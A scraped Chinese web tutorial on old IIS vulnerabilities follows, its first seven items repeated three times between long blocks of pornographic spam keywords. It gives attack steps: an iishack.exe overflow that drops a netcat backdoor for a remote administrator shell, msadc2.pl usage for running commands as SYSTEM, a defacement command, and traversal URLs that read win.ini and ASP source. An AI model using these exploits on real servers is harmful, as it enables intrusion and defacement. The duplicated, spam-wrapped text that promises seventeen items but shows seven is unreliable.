欧美三区四区_av先锋影音资源站_亚洲第一论坛sis_影音先锋2020色资源网_亚洲精品社区_在线免费观看av网站_国产一区二区伦理_亚洲欧美视频一区二区_99视频精品全部免费在线_精精国产xxxx视频在线

IIS的十七個(gè)常見(jiàn)安全漏洞_Web服務(wù)器教程

編輯Tag賺U幣
教程Tag:暫無(wú)Tag,歡迎添加,賺取U幣!

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容,你可以請(qǐng)求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容,你可以請(qǐng)求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容

來(lái)源:網(wǎng)絡(luò)搜集//所屬分類(lèi):Web服務(wù)器教程/更新時(shí)間:2012-07-24
相關(guān)Web服務(wù)器教程
亚洲天堂视频在线播放| 正在播放亚洲| 国产精品三级在线观看无码| 亚洲天堂av影院| 日本在线不卡视频| 日韩精品中文字幕一区二区三区 | 亚洲美女15p| 精品在线播放午夜| 日韩午夜激情视频| 激情小说一区| 亚洲乱亚洲高清| 91国产丝袜在线播放| 国产精品欧美日韩久久| 日本黄色一级网站| 天天操天天干天天| 国内精品久久久久影院色| 亚洲成人网av| 亚洲一区二区三区欧美| 国产香蕉在线视频| 欧美激情另类| 色哦色哦哦色天天综合| 91香蕉视频在线下载| 非洲一级黄色片| 嗯用力啊快一点好舒服小柔久久| 国产精品视频一二三| 欧美高跟鞋交xxxxhd| 在线免费观看av的网站| 污污视频在线观看网站| 激情综合网av| 永久555www成人免费| 成年人网站国产| 99国产超薄丝袜足j在线观看| 丝袜熟女一区二区三区| www.久久久久爱免| 国产亚洲精品aa午夜观看| 欧美激情免费视频| 欧美国产激情18| 阿v天堂2017| 精品久久久无码中文字幕| 秋霞影院一区二区| 亚洲欧美日本精品| 可以看毛片的网址| 国产www视频| 国产原创一区二区三区| 在线亚洲男人天堂| 日本女优爱爱视频| 欧美日韩视频免费观看| 99精品国产99久久久久久白柏| 操91在线视频| 黄色一级片免费播放| 亚洲精品tv| 国产精品视频一二三| 久久99国内精品| 国产剧情一区二区| 色偷偷av一区二区三区| 国产aaa一级片| 人妻少妇精品无码专区| 粉嫩aⅴ一区二区三区四区| x99av成人免费| 日韩国产一区三区| avove在线观看| 91精品国产乱码久久久| 精品一区二区三区的国产在线播放| 亚洲人成电影网站色| 午夜精品久久久内射近拍高清| 日本xxxxwww| 91网上在线视频| 88xx成人精品| 男生裸体视频网站| 国产欧美日韩精品高清二区综合区| 欧美日韩亚洲高清| 日本中文不卡| 亚洲图片在线播放| 国产成人在线色| 国色天香2019中文字幕在线观看| 欧美xxxxx精品| 国产欧美日韩视频在线| 欧美亚洲精品一区| 日本丰满少妇黄大片在线观看| 精品国产无码一区二区| 成人av在线观| 日韩免费在线看| 性爱在线免费视频| 欧美成人午夜| 亚洲精品国产拍免费91在线| 黄在线观看网站| 日韩色性视频| 亚洲图片自拍偷拍| 欧美日韩综合网| 在线免费观看高清视频| 成人免费视频播放| 国产成人综合av| 好吊日在线视频| 亚洲在线成人| 日韩一中文字幕| 亚洲香蕉中文网| 色喇叭免费久久综合网| 精品日韩成人av| 无码少妇一区二区三区芒果| 激情久久免费视频| 欧美三级免费观看| 91手机视频在线| 天天操天天操天天操| 国产精品电影院| 精品国产_亚洲人成在线| 中文字幕一二区| av一区二区不卡| 国产美女久久精品香蕉69| 国产午夜精品一区二区理论影院 | 337p亚洲精品色噜噜噜| 国产黄视频在线| 国产精品99| 精品国产精品自拍| 只有这里有精品| 午夜无码国产理论在线| 一区二区三区中文免费| 色噜噜狠狠色综合网| 欧美 日韩 国产 成人 在线| 综合久久久久综合| 日韩精品资源| 亚洲欧美综合一区二区| 一区二区三区四区不卡在线| 日韩欧美一区二区三区四区五区| 亚洲精品一区二区三区区别| 国产精品久久国产精麻豆99网站| 久久人人九九| 天堂在线中文网| 亚洲一二三级电影| 欧美a级黄色大片| 日韩电影免费观看高清完整版在线观看| 高跟丝袜一区二区三区| 五月丁香综合缴情六月小说| 日韩精品中文字幕一区二区| 欧美久久久久久久久| 亚洲少妇第一页| 免费看成人哺乳视频网站| 日韩的一区二区| 国产极品一区二区| 国产午夜精品一区二区三区欧美 | 亚洲女同av| 精品动漫一区二区| 欧美精品久久久久久久久久久| 秋霞午夜一区二区三区视频| 欧美男女性生活在线直播观看| 免费看a级黄色片| 波多野结衣在线观看一区二区| 亚洲精品综合久久中文字幕| 亚洲精品女人久久久| 99成人免费视频| 97碰碰碰免费色视频| www.国产成人| 91日韩在线专区| 欧美精品国产精品久久久| 澳门成人av网| 一本色道久久综合亚洲91| avav在线播放| 51vv免费精品视频一区二区 | 国产精品一区二区3区| 亚洲影院在线播放| 26uuu国产电影一区二区| 黄色91av| 天天干天天舔天天射| 欧美日韩在线免费| 国产成人无码精品久久久性色| 成人三级毛片| 精品国产sm最大网站免费看| 人妻av一区二区三区| 99热这里只有精品8| 韩国三级电影久久久久久| 久久免费小视频| av在线不卡免费看| 国产一区二区三区四区五区在线| 亚洲精品字幕在线| 激情亚洲一区二区三区四区| 成熟丰满熟妇高潮xxxxx视频| 国产欧美三级电影| 亚洲视频欧洲视频| www久久久久久久| 黑人巨大精品欧美一区| 91九色在线视频| 亚洲一级黄色大片| 亚洲国产aⅴ成人精品无吗| 免费看日本毛片| 国产成人ay| 日韩中文字在线| 麻豆一区产品精品蜜桃的特点| 成人涩涩免费视频| 欧美成ee人免费视频| free欧美| 69堂成人精品免费视频| 国产午夜在线一区二区三区| 亚洲精品专区| 国产精品电影网站| 亚洲一级黄色大片| 一区二区三区蜜桃网| 成人免费观看视频在线观看| 日本一区二区高清不卡| 色婷婷**av毛片一区| 免费中文字幕在线| 国产精品456| 午夜欧美一区二区三区免费观看| 日本一区二区三区播放| 日韩精品免费在线| 中国美女黄色一级片| 91在线播放网址| 亚洲资源在线网| 精品人人人人| 自拍偷拍亚洲一区| 久久精品久久精品久久| 欧美激情一区二区三区在线| 真人做人试看60分钟免费| 亚洲一区二区三区免费| 最近2019年好看中文字幕视频| 国产精品九九九九九九| 粉嫩13p一区二区三区| 欧美大香线蕉线伊人久久| 成人免费观看49www在线观看| 欧美精品一区二区高清在线观看| 国产精品密蕾丝袜| 99国产精品久| 中文字幕在线亚洲三区| 日本国产精品| 另类色图亚洲色图| 91麻豆成人精品国产免费网站| 亚洲综合色区另类av| 永久久久久久| 亚洲精品一级二级三级| 精品国产一区二区三区久久狼黑人| 日韩午夜免费| 不卡av日日日| 福利网址在线观看| 亚洲一区二区欧美日韩| 亚洲这里只有精品| 国产激情视频在线播放| 福利精品视频在线| 三级黄色片播放| 七七婷婷婷婷精品国产| 精品欧美国产| 91精品啪在线观看国产手机| 亚洲欧美国产日韩天堂区| 国产欧美一区二区三区在线看蜜臂| 国产精品久久久久久久久久免费看| 无码精品a∨在线观看中文| 欧美精品网站| 国产有码在线一区二区视频| 88xx成人永久免费观看| 亚洲国产私拍精品国模在线观看| 99精品久久久久| 93久久精品日日躁夜夜躁欧美| 久操网在线观看| 激情欧美日韩| 产国精品偷在线| 97视频一区| 97在线看福利| 精品视频高清无人区区二区三区| 国产精品国产| 久久99久久亚洲国产| 国产老妇伦国产熟女老妇视频| 欧美私人免费视频| 欧美性x x x| 亚洲人一二三区| 天天做天天干天天操| 蜜臀av性久久久久蜜臀av麻豆| 国产欧美日韩一区| 欧美三级电影在线| 97精品一区二区视频在线观看| 黄色小视频免费在线观看| 欧美性色黄大片| 久久av红桃一区二区禁漫| 1000部国产精品成人观看| 欧美成人三级在线播放| 国内精品视频666| 久久久久久免费看| 亚洲欧美日韩专区| 欧美一区观看| 欧美第一精品| 福利视频久久| 婷婷国产精品| 国产精品久久久久久av福利软件| av在线亚洲一区| 欧美大片免费看| 五月天福利视频| 亚洲欧美日韩一区二区三区在线| 96日本xxxxxⅹxxx17| 日韩欧美你懂的| 日韩手机在线观看| 色综合久久中文综合久久97| 任我爽在线视频| 亚洲精品综合在线| 精品久久久久一区二区| 91在线免费视频观看| 亚洲精品20p| 国产a久久麻豆| 免费大片在线观看| 国产精品18久久久久久麻辣| 亚州视频一区二区三区| 亚洲网站在线看| 国产精品玖玖玖| 亚洲成人黄色在线| 免费污污视频在线观看| 日韩欧美中文字幕在线播放| 日本一级特级毛片视频| 亚洲一卡二卡三卡四卡| xxx在线播放| 国产精品全国免费观看高清 | 亚洲av无码一区二区三区在线| 亚洲国产精品一区二区久久 | 欧美日韩你懂得| 日本少妇激情视频| 欧美日韩一二区| 国产成人在线播放视频| 欧美综合一区二区| 欧美特黄aaaaaa| 日韩一区二区不卡| 久久国产乱子伦精品| 日韩电影在线观看中文字幕 | 国产精品亚洲综合久久| 精品国产免费无码久久久| 欧美性xxxxx极品少妇| 欧美日韩人妻精品一区二区三区| 亚洲精品中文字幕在线观看| 欧美熟妇激情一区二区三区| 一区二区三区在线视频免费| 国产黄色网址在线观看| 国产伦精品一区二区三区88av| 三级一区在线视频先锋| 在线视频不卡一区二区三区| 亚洲国产日韩在线| 天天爽天天狠久久久| 黄色日韩在线| 色中文字幕在线观看| 丝袜诱惑亚洲看片| jizzjizz国产精品喷水| 国产剧情在线观看一区二区| 宅男噜噜噜66国产免费观看| 国产高清亚洲一区| 天堂av手机在线| 国产精品乱码妇女bbbb| 精品中文字幕在线播放| 亚洲成人免费电影| 婷婷在线精品视频| 欧美精品xxxxbbbb| 亚洲精品一区二三区| 在线观看日韩欧美| 激情开心成人网| 日本久久久久久久| 欧美日韩有码| 日产精品高清视频免费| 巨乳诱惑日韩免费av| 看一级黄色录像| 国产福利一区在线观看| 亚洲欧美日韩一二三区| 国产精品网站一区| 国产探花在线视频| 91精品婷婷国产综合久久性色| 一本色道久久综合熟妇| 亚洲人成亚洲人成在线观看| 视频精品导航| 国产精品久久av| 国产毛片一区二区三区| 亚洲欧美精品| 精品中文av资源站在线观看| 欧美特级aaa| 一区二区三区中文在线| 日韩黄色免费观看| 欧美成人女星排名| 国产喷水吹潮视频www| 欧美精品激情视频| 青青一区二区| 蜜桃麻豆www久久国产精品| 日韩国产欧美三级| 亚洲精品一区二区三区不| 国产理论视频在线观看| 久久久精品久久久| 久久视频免费| 精品伦精品一区二区三区视频| 国产精品免费看| 国产熟人av一二三区| 亚洲视频免费看| 久久免费视频精品| 免费在线观看不卡| 免费av网址在线| 欧美激情一区三区| 欧美黄色免费看| 亚洲精品国产精品久久清纯直播| 韩日成人影院| 92看片淫黄大片欧美看国产片 | 国产精品美女久久福利网站| 麻豆一区在线观看| 日韩欧美国产三级电影视频| 无码精品黑人一区二区三区 | 香蕉网在线播放| 欧美影院一区二区三区| 国产喷水福利在线视频| 欧美一级高清免费播放| 日韩免费久久| 日本大胆人体视频| 中文av一区二区| 国产亚洲精品久久久久久无几年桃 | 中文字幕在线观看二区|